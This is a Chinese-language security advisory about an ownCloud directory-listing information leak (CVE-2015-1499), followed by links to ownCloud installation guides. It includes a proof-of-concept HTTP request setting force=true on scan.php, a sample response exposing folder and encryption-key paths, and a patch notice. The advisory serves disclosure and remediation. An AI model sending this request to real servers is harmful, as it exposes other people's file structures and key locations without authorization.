Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / owncloud信息泄露漏洞(CVE-2015-1499)

owncloud信息泄露漏洞(CVE-2015-1499)
发布日期:2016-01-07
更新日期:2016-01-08

受影响系统:
ownCloud ownCloud <= 8.2.1
ownCloud ownCloud <= 8.1.4
ownCloud ownCloud <= 8.0.9
描述:
CVE(CAN) ID: CVE-2015-1499

ownCloud是开源文件同步和共享解决方案。

owncloud <= 8.2.1, <= 8.1.4, <= 8.0.9版本的目录列表中存在信息泄露漏洞,此漏洞位于index.php/apps/files/ajax/scan.php的"force"参数中,通过设置该参数值为"true",可使攻击者获取完整目录结构及其所有文件信息。

<*来源:Adam Mari&#353;
  *>

测试方法:
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Adam Mari&#353; ()提供了如下测试方法:

GET /index.php/apps/files/ajax/scan.php?force=true&dir=&requesttoken=<VALIDREQUESTTOKEN> HTTP/1.1
Host: [HOST]
Accept: text/event-stream
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: [REFERER]
Cookie: [COOKIES]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache


Server response (shortened):

event: user
data: "[ID]"

event: folder
data: "/"

event: count
data: 21

event: count
data: 42

event: count
data: 63

event: folder
data: "/[ID]"

event: folder
data: "/[ID]/cache"

event: folder
data: "/[ID]6/files"

event: folder
data: "/[ID]/files_encryption"

[...]

event: folder
data: "/[ID]/files_encryption/keys/files/[FILENAME].zip"

event: folder
data: "/[ID]/files_encryption/keys/files/[FILENAME].zip/OC_DEFAULT_MODULE"

event: folder
data: "/[ID]/files_encryption/keys/files/[FILENAME].pptx"

[...]

建议:
厂商补丁:

ownCloud
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://owncloud.org/security/advisory/?id=oc-sa-2016-002CentOS7下Nginx+ownCloud+PHP+MySQL搭建个人私有云  http://www.linuxidc.com/Linux/2015-05/117086.htm在Ubuntu上安装OwnCloud 7.0.4  http://www.linuxidc.com/Linux/2015-01/111710.htmCentOS 6.3搭建个人私有云存储ownCloud http://www.linuxidc.com/Linux/2014-03/98757.htm在Ubuntu 12.04 LTS上安装ownCloud 4.0.6平台 http://www.linuxidc.com/Linux/2012-08/68297.htmCentOS 6.2下安装ownCloud 4.0图解 http://www.linuxidc.com/Linux/2013-03/80994.htmUbuntu 12.04下使用ownCloud搭建私人存储云 http://www.linuxidc.com/Linux/2013-08/89380.htmUbuntu/Debian/CentOS/Fedora/OpenSUSE 及衍生系统如何安装 OwnCloud 6 http://www.linuxidc.com/Linux/2014-06/102679.htm